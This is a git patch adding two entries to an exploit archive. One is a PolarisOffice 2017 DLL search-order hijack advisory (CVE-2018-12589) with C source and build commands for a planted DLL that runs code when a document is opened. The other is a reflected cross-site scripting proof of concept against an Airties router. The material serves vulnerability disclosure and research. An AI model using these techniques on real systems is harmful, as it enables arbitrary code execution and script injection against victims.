From 5e6d4321612314f46899876025a3bd6e2427a61a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 7 Jul 2018 05:01:49 +0000
Subject: [PATCH] DB: 2018-07-07

2 changes to exploits/shellcodes

PolarisOffice 2017 8 - Remote Code Execution
Airties AIR5444TT - Cross-Site Scripting
---
 exploits/windows/remote/44985.c | 119 +++++++++++++++++++++++++++++
 exploits/windows/webapps/44986.txt | 17 +++++
 files_exploits.csv | 2 +
 3 files changed, 138 insertions(+)
 create mode 100644 exploits/windows/remote/44985.c
 create mode 100644 exploits/windows/webapps/44986.txt

diff --git a/exploits/windows/remote/44985.c b/exploits/windows/remote/44985.c
new file mode 100644
index 000000000..acf890d02
--- /dev/null
+++ b/exploits/windows/remote/44985.c
@@ -0,0 +1,119 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REMOTE-CODE-EXECUTION.txt
+[+] ISR: Apparition Security
+
+
+Vendor:
+=============
+www.polarisoffice.com
+
+
+Product:
+===========
+PolarisOffice 2017 v8
+
+Polaris Document Solution is an integrated solution for corporate document life cycle from document creation, use, management, security, and collaboration.
+
+Used by more than 70 million subscribers in 240 countries.
+
+
+Vulnerability Type:
+===================
+Remote Code Execution
+
+
+CVE Reference:
+==============
+CVE-2018-12589
+
+
+Security Issue:
+================
+Polaris Office 2017 8.1 allows attackers to execute arbitrary code via a Trojan horse "puiframeworkproresenu.dll" file
+in the current working directory, due to a search order flaw vulnerability.
+
+1) create a 32bit DLL named "puiframeworkproresenu.dll"
+2) put any .PDF or .PPTX file or whatever that is configured to open in Polaris Office in same directory as the above DLL
+3) open the document (PDF etc) then BOOM our arbitrary DLL will execute on victims system.
+
+This can be observed as well with both the DLL and a document opened from a remote share.
+
+
+
+Exploit/POC:
+=============
+
+#include
+
+/* hyp3rlinx */
+
+/*
+gcc -c -m32 puiframeworkproresenu.c
+gcc -shared -m32 -o puiframeworkproresenu.dll puiframeworkproresenu.o
+*/
+
+void trojanizer(){
+ MessageBox( 0, "Continue with PWNAGE?" 
, "philbin :)" , MB_YESNO + MB_ICONQUESTION ); +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ + switch(fdwReason){ + case DLL_PROCESS_ATTACH:{ + trojanizer(); + break; + } + case DLL_PROCESS_DETACH:{ + trojanizer(); + break; + } + case DLL_THREAD_ATTACH:{ + trojanizer(); + break; + } + case DLL_THREAD_DETACH:{ + trojanizer(); + break; + } + } + + return TRUE; +} + + + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: June 14, 2018 +Vendor confirms vulnerability : June 19, 2018 +Mitre assigned CVE : June 20, 2018 +Vendor replied fix will be in July +however, update was released : June 23, 2018 +Notified vendor of impending advisory : June 23, 2018 +Vendor : "glad to hear that your problem has been solved" +June 26, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/webapps/44986.txt b/exploits/windows/webapps/44986.txt new file mode 100644 index 000000000..bf6adcc5d --- /dev/null +++ b/exploits/windows/webapps/44986.txt 
@@ -0,0 +1,17 @@
+# Exploit Title: Airties AIR5444TT - Cross-Site Scripting
+# Date: 2018-07-06
+# Exploit Author: Raif Berkay Dincel
+# Vendor Homepage: airties.com
+# Software [http://www.airties.com.tr/support/dcenter/]
+# Version: [1.0.0.18]
+# CVE-ID: CVE-2018-8738
+# Tested on: MacOS High Sierra / Linux Mint / Windows 10
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype=
+
+# Proof of Concepts:
+
+192.168.2.1/top.html?page=main&productboardtype=
+
+http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9fa5c04a5..813259b06 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16598,6 +16598,7 @@ id,file,description,date,author,type,platform,port
 44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
 44968,exploits/windows/remote/44968.rb,"FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
 44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
+44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39627,3 +39628,4 @@ id,file,description,date,author,type,platform,port
 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
+44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80